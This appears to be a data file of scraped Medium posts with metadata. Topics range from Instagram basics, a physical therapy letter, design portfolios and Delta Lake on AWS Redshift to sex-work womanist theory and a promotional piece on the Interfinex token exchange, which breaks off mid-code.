-We can choose as our caregivers professionals who trust in our ability to birth naturally. Caregivers who are willing to wait and do nothing if no intervention is necessary, who understand the importance of our emotional well-being before and during birth, and who are willing to support us in the way we want to birth our children. (I highly recommend pre-natal education courses such as CalmBirth or SheBirths for all of the above.)
|
https://medium.com/@liisahalme/are-we-being-ripped-off-with-a-medicalised-conveyer-belt-births-8589a874bae
|
['Liisa Halme']
|
2019-11-16 21:04:18.818000+00:00
|
['Birth', 'Birthing', 'Homebirth', 'Birth Trauma', 'Pregnancy']
|
What is Instagram? How to Create an Instagram Account
|
What is Instagram? How to Create an Instagram Account
Instagram is a social media platform where people share photos and short videos. In this article, I will tell you what Instagram is and how to create an Instagram account, along with some other things about Instagram. Zihad Hossain Dec 27, 2020·5 min read
Over the past few years, Instagram’s popularity has grown very fast: in December 2016, the number of Instagram users was 428.1 million, and now, in 2020, the number of users is more than 854.5 million!
Taking selfie for Instagram
If you don’t have an Instagram account and don’t even know what Instagram is, then this article is for you. In it, we will cover all the basics so that you know what Instagram is and how you can create an account on Instagram.
The number of Instagram users has increased a lot over time. Millions of people and celebrities use this social media platform to engage with their audience. People usually share their life moments with their followers on Instagram.
What Is Instagram?
Instagram is a free photo and video sharing social media app, available for Android, iOS and Windows Phone. You can upload your photos or videos and share them with your followers or friends.
Simply put, Instagram is a social media platform where you can engage with others by sharing your photos and videos. You can also build your own following on Instagram. Instagram is now the biggest online photo-sharing platform.
Instagram allows users to edit and share photos and short videos through a mobile app. Users can add a caption to each of their posts and use hashtags to reach more people, and they can also use location-based geotags to index these posts. Every post by a user shows up in their followers’ Instagram feeds, and those posts can also reach new people through the right hashtags.
Users can make their profiles private. If they do, only their followers are able to see their posts.
Using Instagram application
As with other social networking platforms, Instagram users can love (react to), comment on and share others’ posts, and they can send personal messages to their friends or followers via the Instagram Direct feature.
On Instagram, you can share your photos or videos to many other social media sites, including Twitter, Facebook and Tumblr, with just one click!
Instagram isn’t just a tool for general use; it is also very effective for businesses. Many digital marketers and business owners use Instagram for their marketing, because you can easily engage with lots of people in a very short time. Also, thousands of people are making millions of dollars just by using Instagram. But for this, you first need a good number of followers.
Don’t worry: if you know the actual methods, then it is very easy for anyone to get millions of real Instagram followers. If you want to learn those methods step by step, from the very beginning to professional influencer, then check this out — click here
Who owns Instagram?
Instagram was launched in 2010 in San Francisco. Instagram was created just to share photos. Instagram was created by Kevin Systrom and Mike Krieger.
But today you can also share videos on Instagram, send direct messages and much more. In 2012, Facebook bought Instagram and made it more useful.
Now, you will find many features on Instagram that were not there before. Also, now you will find many types of filters in it to customize your pictures and videos.
Using Instagram
First of all, you need to create your account on Instagram; if you have a Facebook account, you can sign up directly through it.
After signing up, you have to choose your unique username. Then you should set up your profile well. You can keep the profile completely private if you wish. If your profile is private, people will not see your posts directly; they will need to send a request first, and then you can accept it. Only then will they be able to see your photos and videos.
Using Instagram application
You can follow your friends, family members, celebrities, favorite personalities, etc., so that when they share a picture, you can see them all. People will also follow you if they like your content. If you’re wishing to become a successful Instagram influencer, then this method can help you — click here
Creating an Instagram Account
1. To create an Instagram account, first you need to go to the Google Play Store and download the Instagram apps.
2. After downloading the Instagram app, you need to sign up. You can sign up with one click with the help of your Facebook account, or you can open an Instagram account with your mobile number or email ID.
3. If you click on Facebook and sign up for an Instagram account, then your Instagram account will be created.
And if you create an Instagram account with a mobile number or email ID, you will be asked to enter your name, and the Instagram account will be created as soon as you enter it. You can customize your account from “Edit Profile”.
Thanks for reading this. To learn more about Instagram and how to earn from it, I recommend you take this course. If you buy the course from this link, you will get a big discount! Check this out.
link — click here.
[Disclaimer: This post may contain affiliate links, which means I may receive a small commission, at no cost to you, if you make a purchase through a link.]
|
https://medium.com/@zihadh687/what-is-instagram-how-to-create-an-instagram-account-dd4a2d5c457a
|
['Zihad Hossain']
|
2020-12-27 03:27:57.670000+00:00
|
['Instagram', 'How To Create', 'Instagram Account', 'What Is Instagram', 'Social Media']
|
Fitness Trauma: when your patient can’t tell you where it hurts.
|
What follows is a letter I wrote to my physical therapist:
I cried through my last week’s session, performing exercises while swallowing mucous and choking back tears. I had to pause at one point to go to the bathroom and cry freely, embarrassed, angry, frustrated. I left today’s session in tears too. I tried to tell you, I did, but you had two other patients you had to see and I couldn’t get the words out and the tears were already coming.
I’m coming to you for a pretty simple problem. Pain. My knee and shoulder hurt. I’ve got weak muscles, you’ve got exercises. You prescribe them, I do them, and my pain goes away. Healing is not linear, there will be ups and downs, but what is shaking me to the point of crying, breaking down, getting nervous to even go to my sessions?
Can we talk about fitness trauma? I googled it and there’s no one talking about this, so I made up the term. I’m talking about elementary school gym class when I cried “running” the mile, crippled by cramps in my abdomen from not breathing properly, not knowing how to run. I ended up walking, it took me 13 minutes, by far the slowest in the class. I never knew what to do in gym class, I never understood it. Later, as an adult, I felt overwhelmed going to a gym or fitness center. I don’t understand the machines, but more importantly I don’t understand my body.
I’m not connected to my body. For the longest time, I didn’t have a relationship with exercise. The effort felt torturous. I tried my hand at CrossFit, even joined a weight lifting gym. I still felt disconnected from my body, flopping around, performing moves without any understanding of how or why, desperately needing to be closely coached and monitored. I never gained that ownership, and ended up quitting all of it.
Finally, two years ago, I fell in love with hiking, and learned how to run. Last year I added an intense yoga practice to the mix. For the first time in my life I understood the relationship between effort and reward. I developed a neurochemical connection to movement. I unlocked my hiker and runner’s high, exertion of a level that made my brain and body sing. I ran three times a week, longer and longer runs. I topped out at 12 miles. I backpacked a 125 mile section of the Appalachian Trail, and 26 Adirondack high peaks. I found my bliss in this life.
Then, a knee injury, followed shortly after by a shoulder injury. My knee hurt so bad I couldn’t run, couldn’t stand, could barely be in any position comfortably. Soon enough, I found that both my knees hurt, my shoulder, my elbow, both my wrists, and my foot. I felt broken and at a complete loss. Without proper insurance coverage, unable to afford physical therapy, I went to my chiropractor for help. He did some functional tests and gave me exercises to strengthen my glutes, quads, and core, to which I applied myself like my life depended on it, which it did. I worked at my exercises relentlessly, daily, picking up short weekly runs again after two months off. This summer, I hiked the high peaks again and my knees felt stronger than ever. I finally felt I had turned the corner on this awful chapter in my life.
I attempted another Adirondack hike a few weeks later. It was night and day. My knees felt worse than they ever had. Pain with each step, and 13 miles left to get me out of the backcountry. No cell service, no choice. I hiked out. After that I doubled down on my exercises, hoping to fix the problem twice as hard and twice as fast.
What might seem intuitive to others, which muscles feel the effort in an exercise, is not to me. I often cannot tell what part of my body is feeling something. I have a history of abuse and trauma, and my family has a strong predisposition to psychosomatic complaints. We all know our bodies can manifest our emotions. Some get headaches, some stomach aches, some tension in the neck and shoulders. When I get stressed out, my throat hurts, and I feel as though I have a cold. If I get really stressed, sometimes I dissociate, and my body no longer feels like it is mine at all. I’ve worked through some of my trauma in EMDR therapy, and my psychosomatic responses are getting milder and milder the more of my abuse I unpack. But if I cry, I’m still sick for 4–5 days following. Maybe you are starting to see the complex set of factors some of your patients may be dealing with?
When you give me an exercise, if I can’t feel it, can’t trust my body, I turn to my mind. I overthink it. I finally understand that rows are a back/scapula exercise, but does that mean it’s two moves, with the arms doing the first part of the work, then the shoulder blades/back performing the second part? Where should my feet be? What angle should all the parts of my body be at, which muscles should I keep tight, which loose? How do I talk to those muscles to get them to do that? Tell me exactly what to do, and watch me, because I can’t feel if I’m doing it right. You’ll see me with my hands on my body often, checking to make sure my hips are level, my core is tight, my glutes are squeezing.
I am slowly moving into my body, learning to inhabit it, learning to be comfortable here. Maybe this disconnection contributed to my injuries. Pushing past subtle signals of discomfort and pain that I didn’t even notice, or didn’t think were important. It has taken me weeks or even months to feel certain muscles working in my body. I had no sense of my glutes, scapular muscles, or core muscles for the first six months of working with them. I’m trying to honor my body now, not push it past pain, take care of it, make it feel safe with me at the helm. But I also feel completely over-attuned to my knee sensations, overanalyzing every twinge. I am in a paradox — both disconnected and overinvolved.
So when I’m given too many cues on a complex movement like a deadlift, I get overwhelmed. Not enough cues, though, and I worry about getting injured. Am I going to hurt my back doing deadlifts wrong? The coach at the weightlifting gym I was at would sit at his desk and describe the moves, never getting up to show me. When I balked, scared to do it wrong, scared to hurt myself, he laughed at me. “It’s easy”, his laugh said, “why are you making this such a big deal?”. He made me feel stupid and ashamed. Fitness trauma. I’ve even considered going to physical therapy school myself, just to finally be able to understand my own body. Do I need to study it? Learn all the names of all the muscles? Or do I need to listen to it? Feel it? Start to trust myself and my body for the first time in my life at the age of 32?
I need you, in ways I don’t want to, but I do. I need to fix these injuries, to reclaim my life. I am so self-conscious of being the troublesome, difficult, unpleasant patient. I want you to want to work with me, to want to help me. I want to be easy and cheerful and compliant. This is what I’m struggling with, though, and I am hoping that if I tell you, honestly, perhaps you can have some empathy and compassion for me as I fumble to tell you that “this week, uh, my knee felt weird, kinda on the outside, it doesn’t feel twisted anymore you see but, um, it kinda hurts, well, maybe pain isn’t the right word, it’s just, I don’t know, it doesn’t matter, let’s just get on the elliptical.”
I’ll see you next session, I’m doing my best.
Anna
|
https://medium.com/@annatheka/fitness-trauma-when-your-patient-cant-tell-you-where-it-hurts-ebcc0e1f3df9
|
['Anna Ka']
|
2020-12-18 16:23:54.975000+00:00
|
['Trauma', 'Physical Therapy', 'Body', 'Trauma Informed', 'Pyschology']
|
Design Portfolios That Will Actually Get You A Job With No Experience
|
This is an important idea to consider when you’re looking to start your creative career in design and you’re polishing your portfolio for future hiring managers.
It’s important to stand out and showcase your unique skills while telling a cohesive story within your collection of work.
You don’t have to have experience to get hired (although it does help greatly), as long as you sell yourself in the right way.
This means that you’re able to show hiring managers your potential for growth and unique combination of skills that you can bring to their workplace.
You can work around this challenge of “no experience” in multiple ways.
Show only your best work
This might be a no brainer but you would be surprised at how many portfolios are rejected due to “filler” pieces that aren’t as good as the rest of the portfolio.
From https://nahelmoussi.com/. Designer Nahel Moussi designed a beautifully creative vertical carousel based on typography to showcase their best work.
You don’t need to meet a certain number for the work you include in your portfolio. Only include your best work that you can be proud of showing to the world.
A good rule of thumb to go by is to make sure your weakest piece of work doesn’t bring down the rest of the portfolio.
Add a “Playground” page
In many portfolios, the possibility of adding an experimental draft page is often overlooked. This can be a safe creative space for you to add the work that you wouldn’t put upfront under the “Works” page.
Designer Samuel Kang has a great “playground” page for his experimental projects.
You can also name it whatever you want with common examples being “Playground”, “Lab” or “Mood board”. This can be a great place to show your creative process for hiring managers.
Aesthetics are important, so is accessibility
It can be tempting to put most of your effort into how “good” your portfolio looks, but what hiring managers value more is accessibility and functionality, as in “How easy is it to navigate through their portfolio?” or “Is every element on the page useful?”
Designer Adrien Laurent uses good color contrast for their portfolio site
Check your menu bar or navigation labels to make sure that even someone with no design experience can explore your portfolio and find what they’re looking for. Make sure everything is legible by checking the font style and size.
Don’t be afraid to try different options for your navigation menu such as a four corner menu instead of the typical top-bar menu.
Start with a “hook” and end with a “cliffhanger”
It’s important to have your strongest pieces at the beginning and at the end. This increases the quality of the viewing experience for anyone looking through your portfolio.
“Cliffhanger” pieces that pique the interest of a hiring manager who may want to know more about your projects can be game-changing.
As soon as you get them “hooked”, you automatically have an icebreaker at the interview.
Add page transitions
This is a simple way to add a finishing touch to your portfolio to make it seem more cohesive as a whole. Make sure the transitions aren’t too overwhelming or distracting though as they can ruin the viewing experience.
Designer Denys Loveiko uses animated page transition to showcase his creativity. He kept the transitions fairly subtle and not over the top.
Show variety
It’s important to show a diverse range of work that require different skills to create. Hiring managers need to see that you can do more than one thing.
Tell your story
Storytelling is an important skill for designers. Unfortunately, most schools don’t teach this skill to design students.
Our founder and CEO, Stella Guan, told her story in audio, written and visual formats that created an engaging experience for users to get to know her as a person
What kind of story do you want to tell through your work?
Is it clear what you’re trying to convey to someone looking at your portfolio for the first time?
Are components of your story in the correct, logical order?
What is the “behind the scenes” story behind this particular piece of work?
Can you show your human side and tell your life story so that hiring managers can get a glimpse into your personality?
Market yourself at every opportunity
One of the best ways to build connections and network is by being more accessible and easier to find for other creative people in the industry.
One way you can accomplish this is by improving your “coming soon” pages that are still under development. Oftentimes, designers leave these kinds of pages blank, which means that people visiting your portfolio hit a dead end.
This problem can be fixed by plugging in your social media accounts and email address or by presenting a teaser or summary for what is to be added to the page.
Designer Andy Davies kept things simple but didn’t forget to include the most important elements right in the first section. You will never struggle to find his social media and contact information.
Keep them interested in your work.
Add a dream client project
This is a way to add a project under your belt without actually being hired. Show what you would do if you were hired by one of your dream employers or big-name companies. Having these kinds of scenarios can help hiring managers visualize what you would do if you were hired in their own company.
It can be daunting to take your first step into the design industry but remember that it gets easier once you get that first design job so make sure to use these tips to make your portfolio even better.
|
https://medium.com/@pathunbound/design-portfolios-that-will-actually-get-you-a-job-with-no-experience-30d7d5cc9c10
|
['Path Unbound']
|
2021-04-01 15:32:37.902000+00:00
|
['Job Search', 'Portfolio', 'Design', 'Designer', 'Ui Ux Design']
|
Experience Amplifier, Sound 1
|
Pavel-to-DMZ Content 3. DMZ Soundscape
The collected sounds from the DMZ area, and the visual works based on those sounds, depict the DMZ vividly. They enable audiences to envision their own imaginary DMZ space without physical restriction.
The DMZ Soundscape project, created by artists Seryoung An and Seunghee Lee, is the fourth piece of Pavel-to-DMZ content. I highly recommend watching the video, even if only for a few minutes. On your travels, if you discover sounds similar to what you heard in this video, your joy of hearing will be amplified.
DMZ Soundscape link
Seryoung An, seryoungan@gmail.com / Seunghee Lee, [email protected]
|
https://medium.com/@pavel-to/experience-amplifier-sound-1-61667a3183bf
|
[]
|
2020-12-23 00:12:53.465000+00:00
|
['Dmz', 'South Korea', 'Sound', 'Experience', 'Travel']
|
Data Lakehousing in AWS
|
Extending OSS Delta Lake with Redshift
The open source version of Delta Lake lacks some of the advanced features that are available in its commercial variant.
Caching & Data Layout Optimisation
The use of Amazon Redshift offers some additional capabilities beyond that of Amazon Athena through the use of Materialized Views.
Materialized Views can be leveraged to cache the Redshift Spectrum Delta tables and accelerate queries, performing at the same level as internal Redshift tables. Materialized views also refresh faster than CTAS or loads.
Redshift Docs: Create Materialized View
Redshift sort keys can be used to similar effect as the Databricks Z-Order function.
Redshift Docs: Choosing Sort Keys
Redshift Distribution Styles can be used to optimise data layout. This technique allows you to manage a single Delta Lake dimension file but have multiple copies of it in Redshift using multiple materialized views, with distribution strategies tuned to the needs of the star schema that it is associated with.
Redshift Docs: Choosing a Distribution Style
Delta File Data Layout Optimisation
Delta Lake files will undergo fragmentation from Insert, Delete, Update and Merge (DML) actions. Just like parquet files, it is important that they be defragmented on a regular basis to optimise their performance.
The open source version of Delta Lake currently lacks the OPTIMIZE function but does provide the dataChange method which repartitions Delta Lake files.
The one input it requires is the number of partitions, for which we use the following aws cli command to return the size of the Delta Lake files.
eg something like:
aws s3 ls --summarize --recursive "s3://<<s3_delta_path>>" | grep "Total Size" | cut -b 16-
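If scripting this check, the Total Size line can be pulled out of the aws cli output without relying on fixed byte offsets. This is a small sketch; the function name is illustrative, and it assumes the `aws s3 ls --summarize` output contains a `Total Size: <bytes>` line, which is what the `grep`/`cut` pipeline above also relies on.

```python
import re

def parse_total_size(ls_output: str) -> int:
    """Extract the byte count from `aws s3 ls --summarize` output.

    Assumes the summary contains a line like '   Total Size: 123456'.
    """
    match = re.search(r"Total Size:\s*(\d+)", ls_output)
    if match is None:
        raise ValueError("no 'Total Size' line found in output")
    return int(match.group(1))
```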
Spark likes file subpart sizes to be a minimum of 128MB, splitting files of up to 1GB in size, so the target number of partitions for repartition should be calculated based on the total size of the files found in the Delta Lake manifest file (which will exclude the tombstoned files no longer in use).
Databricks Blog: Delta Lake Transaction Log
We found the compression rate of the default snappy codec used in Delta Lake to be about 80% with our data, so we multiply the file sizes by 5 and then divide by 128MB to get the number of partitions to specify for the compaction.
Delta Lake Documentation: Compaction
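Putting the numbers above together, the target partition count for the compaction can be sketched roughly as follows. The function and constant names are illustrative, and the ×5 factor comes from the compression rate we observed on our own data, not from any Delta Lake API:

```python
import math

SNAPPY_COMPRESSION_FACTOR = 5                # ~80% compression observed on our data
TARGET_PARTITION_BYTES = 128 * 1024 * 1024   # Spark's preferred minimum split size

def target_partitions(total_compressed_bytes: int) -> int:
    """Estimate the repartition count from the compressed size on S3."""
    uncompressed = total_compressed_bytes * SNAPPY_COMPRESSION_FACTOR
    return max(1, math.ceil(uncompressed / TARGET_PARTITION_BYTES))
```

The result is what gets passed as the single repartition input mentioned above.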
Once the compaction is completed it is a good time to VACUUM the Delta Lake files, which by default will hard delete any tomb-stoned files that are over one week old.
Delta Lake Documentation: Vacuum
Some Advice
Spectrum DDL
It is important to specify each field in the DDL for spectrum tables and not use “SELECT *”, which would introduce instabilities on schema evolution as Delta Lake is a columnar data store. When the schemas evolved, we found it better to drop and recreate the spectrum tables, rather than altering them.
This is important for any materialized views that might sit over the spectrum tables. If the spectrum tables were not updated to the new schema, they would still remain stable with this method.
Materialized View DDL
As tempting as it is to use “SELECT *” in the DDL for materialized views over spectrum tables, it is better to specify the fields in the DDL. We found it much better to drop and recreate the materialized views if the schema evolved.
If the fields are specified in the DDL of the materialized view, it can continue to be refreshed, albeit without any schema evolution.
This is preferable however to the situation whereby the materialized view might fail on refresh when schemas evolve.
Thank you
Databricks
I would like to thank Databricks for open-sourcing Delta Lake and the rich documentation and support for the open-source community.
AWS
I would like to thank the AWS Redshift Team for their help in delivering materialized view capability for Redshift Spectrum and native integration for Delta Lake.
I would also like to call out Mary Law, Proactive Specialist, Analytics, AWS for her help and support and her deep insights and suggestions with Redshift.
SEEK Enterprise DataOps Team
I would like to thank my fellow Senior Data Engineer Doug Ivey for his partnership in the development of our AWS Batch Serverless Data Processing Platform.
I would also like to call out our team lead, Shane Williams for creating a team and an environment, where achieving flow has been possible even during these testing times and my colleagues Santo Vasile and Jane Crofts for their support.
SEEK is a great place to work ❤️
|
https://medium.com/seek-blog/data-lakehousing-in-aws-7c76577ed88f
|
['George Pongracz']
|
2020-11-23 22:01:47.316000+00:00
|
['Delta Lake', 'Engineering', 'Apache Spark', 'Amazon Redshift', 'Data Lakehouse']
|
thotscholar: a working theory of proheaux (woman)ism [1] [revised 2019] w/blog commentary
|
Photo by Jessica Felicio on Unsplash
bbydollpress.com
Part One: Commentary
I wrote a similar piece, on Medium, that blew up unexpectedly, c. 2016. I didn’t anticipate anyone really reading or quoting it. I had written it off the top of my head. But suddenly, folks were citing my work and ascribing all kinds of things to it. I am a bisexual erotic laborer, writer, and scholar whose work has centered my lived experience and the scholarship of others. Though I do my best to understand and center other groups of people, understandably I will sometimes fail. I likely hold problematic views just like any other human in this world, yet I strive every day to evolve in my theory and practice and to be better today than I was yesterday. Because my online scholarship (and yes, I’m counting Twitter) is limited to my own experiences and focuses on very specific topics, it makes sense that I am rarely caught out of my element. I understand that bothers a great number of people. Trust and believe I am wrong about a lot of things offline and you needn’t worry that I’m perfect or pretending to be. The experiences that I’ve shared and the embarrassments I’ve sometimes suffered prove that I am nowhere near perfect, or claiming to be.
Recently another Black woman made an attempt to discredit my work by claiming that it “centers cishet men.” This woman is a young queer academic and has aspirations of publishing her own work and being cited similarly, so I can understand why she feels competitive and why it must seem like there is not enough room for more than one — academia is notoriously unfriendly to Black women. However, I believe that there is room for all of us and that there are other ways for our work to gain notice, and I do not measure my success in the same way that other people do: awards, lists, accolades. Though these things are nice, I measure myself by my own standards. I have never created work that centered anyone but myself and other multiply marginalized people. Sometimes that includes Black men. Sometimes it doesn’t.
Part Two: The Actual Point
proheauxism 1. Proheaux womanism. Derived from the more colloquial “pro-hoe.” (Spelling altered to reflect difference & refinement[2].) A sex worker womanist, feminist, or hustler-heaux committed to collective and personal justice, not just sexually, but through recognition of labor and physical security. Radically thotty[3], and proud of it. Curious about their sexuality, about birth and rebirth, about challenge and change, about redemption and reparations, about the physical and the emotional. Loves the river in all its incarnations. A pro-sex, pro-pleasure politic that is specifically centered on the multiply marginalized. Might be: marvelous. One who owns oneself and one’s own sexuality or gender expression, regardless of whether or not they are attached to a man or masculine person.
2. A womanist who rejects antiheaux sentiments as well as respectability, racial capitalism, and whore hierarchies. Rejects misogynoir and transmisogynoir — all forms of misogyny, period. Does not accept nor engage in active or passive transphobia, homophobia, colorism, xenophobia, classism, or anti Blackness. Doesn’t juxtapose the erotic and pornography, and recognizes that non-exploitative pleasure comes in varied forms, is not always sex-centered, and is paramount to the human experience. Against all forms of erasure and systemic oppression. Recognizes that solidarity is impossible without acknowledging difference and rejects the urge to homogenize experiences under the guise of inclusivity.
3. Rejection of the idea of one standard of femininity as determined by genitalia (transphobia/intersex erasure and denial). Ecowomanist-minded, in the sense that they are against the environmental racism that plagues black, and brown, and indigenous peoples across the globe due to industrialization, pollution, and redlining which locates hazardous materials in poor, Black, and brown neighborhoods. Committed to the safety of all marginalized peoples. A rejection of phallocentrism (dick-centrism), gender and biological essentialism, racism, cissexism, heterosexism, fatphobia, ageism, ableism, and speciesism — not only in the realm of sexual and pleasure politics, but in all realms. Cares for the environment as a whole, desires to correct the exploitation of all animals, and rejects the notion of human-animal superiority in favor of preserving the ecosystem as a whole. Committed to self, to community, to justice.
4. Commitment to decriminalization and destigmatization of erotic, “vice,” and informal labor. Not just pro-casual sex and pro-promiscuity, but pro-sex work(er). Not simply sex (choice) positive, but pragmatic and communal. Understands the complexities between empowerment and exploitation when residing in an oppressive or imperialist colonized state. Against all forms of racial and genital fetishism. Opposed to the co-option of prison abolitionist language by colonizers and anti-sex work activists. Eschews transgression for the sake of transgression — being “subversive” and securing the ability to “choose under the system” is not inherently revolutionary. Against sexual or body shaming of any kind. Commitment, autonomy, and agency, in particular regard to reproductive/sexual, mental and physical health, including but not limited to access to abortion, antiretroviral drugs, adequate child care, health insurance, and affordable housing. Always centers the multiply marginalized. Isn’t here for supporting multiculturalist white supremacy. Devoted to economic freedom, and critiquing and dismantling capitalism.
5. A hustler, a professional hoe, prostitute, erotic or informal laborer who is producing, living, and surviving sometimes via sexual, sexual-affective, or erotic means. A poor/working class innovator.
— — — — — —
[1] This was originally called “a working definition of proheaux womanism.” I wrote the original off the top of my head and published it on Medium, not thinking that anyone would ever read it. This is a revised version. I changed the title to “a working theory of proheaux womanism,” because I want it to be clear that I appropriated a definitional style and that it is not actually a “definition” in the traditional sense.
[2] Sometime in the mid 2000s or (most likely) even earlier, Black women began spelling words with an — eaux — a “Frenchified” suffix. By “refined” I mean: “precise or exact.” It is exactly “black” slang, though it has been widely appropriated by the masses. I also explored this in a 2018 Twitter thread: https://twitter.com/thotscholar/status/981141389533642752
[3] sexual
Photo by Jessica Felicio on Unsplash
|
https://medium.com/heauxthots/thotscholar-a-working-theory-of-proheaux-woman-ism-1-revised-2019-w-blog-commentary-2775fc27f1a8
|
[]
|
2019-09-09 22:19:21.003000+00:00
|
['Suprihmbe', 'Sex Work', 'Feminism', 'Thotscholar', 'Proheauxism']
|
How to maintain the focus as a software developer?
|
Software development is very challenging. First you have to understand the problem you are solving. Then you need to think of a solution. Depending on the solution, you have to research the proper technology. Throughout the process, you need a clear perception of the system you are working on, and you need to think long term. If not, any future changes will be hard to pull off.
It’s not enough to be a great engineer to develop and maintain software; the effort you invest in the process has to be excellent too. I’ve made tons of mistakes simply because I lost focus, so I’ve been looking at different techniques to get into a focused state faster and to preserve it.
Why do we need to focus?
I believe this is quite obvious; nevertheless, let’s point out a few facts. When you focus, you direct your attention to a single task. You make decisions quicker, and you absorb and process information faster. Focus is the first step to getting into the flow state. Flow is an optimal state of consciousness, a peak state where we both feel our best and perform our best. It’s hard to get into that state, and if it’s disrupted, we need a long time to get back, if we get back at all. That’s why we need to focus intensely on our work, so we can perform better.
Have clear goals
Focus here is on the clear, not on the goals.
I’ve seen many developers who think that sprint planning and defining tasks are, in some sense, a waste of time: you have to go into the details of every single task; there are discussions about parts of the software you won’t develop; it’s better to spend time on development because small decisions can be made along the way; the assignments seem clear already.
All these reasons are wrong, or the person defining the tasks is not doing their job adequately. First, you have to have the broader picture of the software, and you never know which feature you’ll end up maintaining. Second, the goal of planning is to save time. If you don’t make all the small decisions up front, you will have to pause your work either to think of a solution or to ask someone to clarify the problem. Either way, you are losing focus, and not just that, you are disturbing someone else’s.
If you work in an environment where you don’t have proper product specifications, try to write them out yourself. If the feature you are working on is complicated, split it into chunks. Now you can focus on the work, not on product decisions. The majority of us are bad multitaskers; we should do only one thing at a time.
Don’t let anything disturb you.
How many times has this situation happened to you?
During the workday, you should have time that is yours alone: no questions from colleagues, no social networking, no fantasy football, no other distractions.
In that part of the day, my phone is on silent mode, and desktop chat apps like Viber or WhatsApp are off. If you are the team lead, I encourage you to make this a team policy so everyone knows not to disturb others and to focus on the job. After this period is over, it’s time for questions and discussion.
This policy is hard to implement in an open space because there are many people and many teams. A former colleague of mine had a great solution: he had a USB lamp, and if it was on, everyone knew not to bother him.
Some people will think this is a selfish approach. I don’t agree. I believe it’s selfish to ask about something that needs only a few minutes of analysis, or to be unwilling to wait a few hours for an answer. If someone has dedicated their full attention to solving a problem, we should respect that. It may feel like they need only a second to give us the solution, but as I already said, it’s very hard to get into the flow and very easy to get out of it.
Organize code well
Imagine you are writing a new service or control for your app. Everything goes as planned, and the new component works great. The next step is to integrate it. You open some older class, look at the code, and can’t understand a thing. You don’t want to work anymore. I have had my fair share of those situations.
Working with old or other people’s code can be very frustrating. You can avoid the problem by using coding standards. When code is clean, organized, and easy to read, understand, and navigate (or, as we call it, beautiful), you won’t lose much time searching for the parts you need. Understanding the code also becomes easier, and therefore it’s easier to maintain focus.
Organized code has other advantages too. I have already written about it. Check it out.
Organize your tasks
During the sprint, you probably get several tasks. First you have to prioritize what’s essential and make sure you can deliver it on time. Afterward, you have the flexibility to arrange the others as you prefer. Some tasks are challenging, some relaxing, and some just boring. Don’t do all the enjoyable stuff first and leave the dull tasks for the end. No matter how exciting a job is, the quality of the code has to be identical.
Focus, and particularly the flow state, are very expensive. They take a lot of energy from us, and we need to regenerate. So if you have more than one fun task in the sprint, after you finish the first, the next one should be a dull or relaxing one. You don’t want to overload your brain and burn out.
If you leave all the boring tasks for the end of the sprint, you won’t have enough energy or desire to complete them all. I like to leave the relaxing ones for the end of the week, so I don’t get exhausted before the weekend.
To get the maximum out of yourself, you have to understand all your responsibilities and know your abilities. If you are too ambitious, you’ll burn out. If you are too relaxed, you’ll stagnate. So be careful with how you organize your tasks.
Struggle well
There are occasions when there are no fun tasks in plain sight: everything we get is either dull or well above our skill level. Even if we apply all the advice above, it’s hard to focus and be as productive as we can be. Sometimes coding is a stressful process, and the effort we need to invest is enormous. Unfortunately, there is no practical advice that can help us here. We have to struggle well.
Stop perceiving struggle as something negative. Struggle is a test of character and creativity. In those moments, to keep myself motivated, I remind myself that there is no avoiding pain, especially if you’re going after ambitious goals. Eventually, you’ll have a breakthrough, and those responsibilities won’t look so difficult anymore.
The last point I want to add is about perception. A few days ago, there was a discussion on Twitter about an article I wrote, and some guy said that creating a modular app is hard. My response was that it’s not hard; it’s challenging. That positive mindset helps you overcome many obstacles and get into a productive state.
Conclusion
Focusing and getting into a flow state can be very difficult. However, we should do our best to get into those states: we learn faster, make better decisions, and solve problems quicker. Software development is quite challenging, and the competition is enormous. We should use every tool and method available to be as productive as we can, so we can stay relevant in the industry.
Want to find out more?
Or do you want to discuss Swift and technology? Follow me on Twitter. You’ll find additional content, reading recommendations, and much more.
|
https://medium.com/flawless-app-stories/how-to-maintain-the-focus-as-a-software-developer-d43aeb25693c
|
['Pavle Pesic']
|
2019-08-07 09:48:48.767000+00:00
|
['iOS', 'Mobile', 'Mobile App Development', 'Swift', 'iOS App Development']
|
New England’s Series A Deals — Part I
|
Recently, The Buzz profiled a number of market maps of the New England venture/startup ecosystem, including the following:
These market maps continue to be very positively received by our subscribers so we’re continuing to deliver. In a continuation of our earlier series on New England Seed Deals, we’re now covering New England Series A deals for companies since 2018. [NOTE: This will be a series of market maps]. Here’s the list:
|
https://medium.com/the-startup-buzz/new-englands-series-a-deals-part-i-8c513c552c8
|
['Matt Snow']
|
2020-10-27 19:02:42.444000+00:00
|
['Business', 'Fundraising', 'Venture Capital', 'Technology', 'Startup']
|
Interfinex — simple and innovative way to swap any ERC20 token into another and pay a negligible fee on all trades
|
The fate of cryptocurrency exchanges appears to be moving gradually towards decentralized exchanges, and many in the crypto community believe they may one day replace centralized exchanges entirely. The daily and monthly trading volume of Uniswap, one of the decentralized exchanges, has exceeded that of Coinbase Pro, one of the pioneering centralized exchanges, since September 2020, and the momentum is holding.
One major shortcoming of centralized exchanges is that once they take custody of your coins, you are no longer in control. Remember the popular saying: not your keys, not your money. Once a hacker gets hold of an exchange's private keys, or hacks their way into administrative privileges, they can wipe out users' funds. Billions of dollars have been lost this way since the start of the blockchain revolution. Other problem areas are enumerated below:
Insecurity: Due to the nature of centralized control, there is a high risk of fund loss and theft, since the exchanges are custodians of users' funds.
High risk: Market manipulation, latency problems, and other issues when dealing with large volumes are characteristic deficiencies of centralized exchanges.
Lack of transparency: Centralized exchanges can perform illegal activities such as front-running orders, manipulating volume, and liquidating users based on the orders submitted.
The Decentralized Exchange
Decentralized exchanges are designing the real future of cryptocurrency platforms. They aim to tackle the problems that impede centralized structures by building a peer-to-peer marketplace that lets users remain custodians of their own assets, making it trustless and preserving security and privacy.
Interfinex Approach
With Interfinex, you can convert any ERC20 token into any other ERC20 token and pay a fee of 0.1% on all trades, or provide a referral and receive a 51% discount (a 0.049% fee). Not only that: you can deposit an equivalent amount of ERC20 tokens into the pool and start yield farming. The amount you earn will depend on the fees paid and the amount of liquidity deposited. You earn ERC20 tokens and Interfinex Bill tokens in every liquidity pool. And it really is that simple and convenient. In addition, 10% of the trading fees will be converted to Interfinex Bills and paid out to liquidity providers, and 80% of the fees will be paid out in the ERC20 token that was sold during the trade.
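The fee figures quoted above work out as follows. This is only a sketch of the stated arithmetic (0.1% base fee, 51% referral discount); it is not code from Interfinex:

```python
BASE_FEE_RATE = 0.001     # the flat 0.1% fee on all trades
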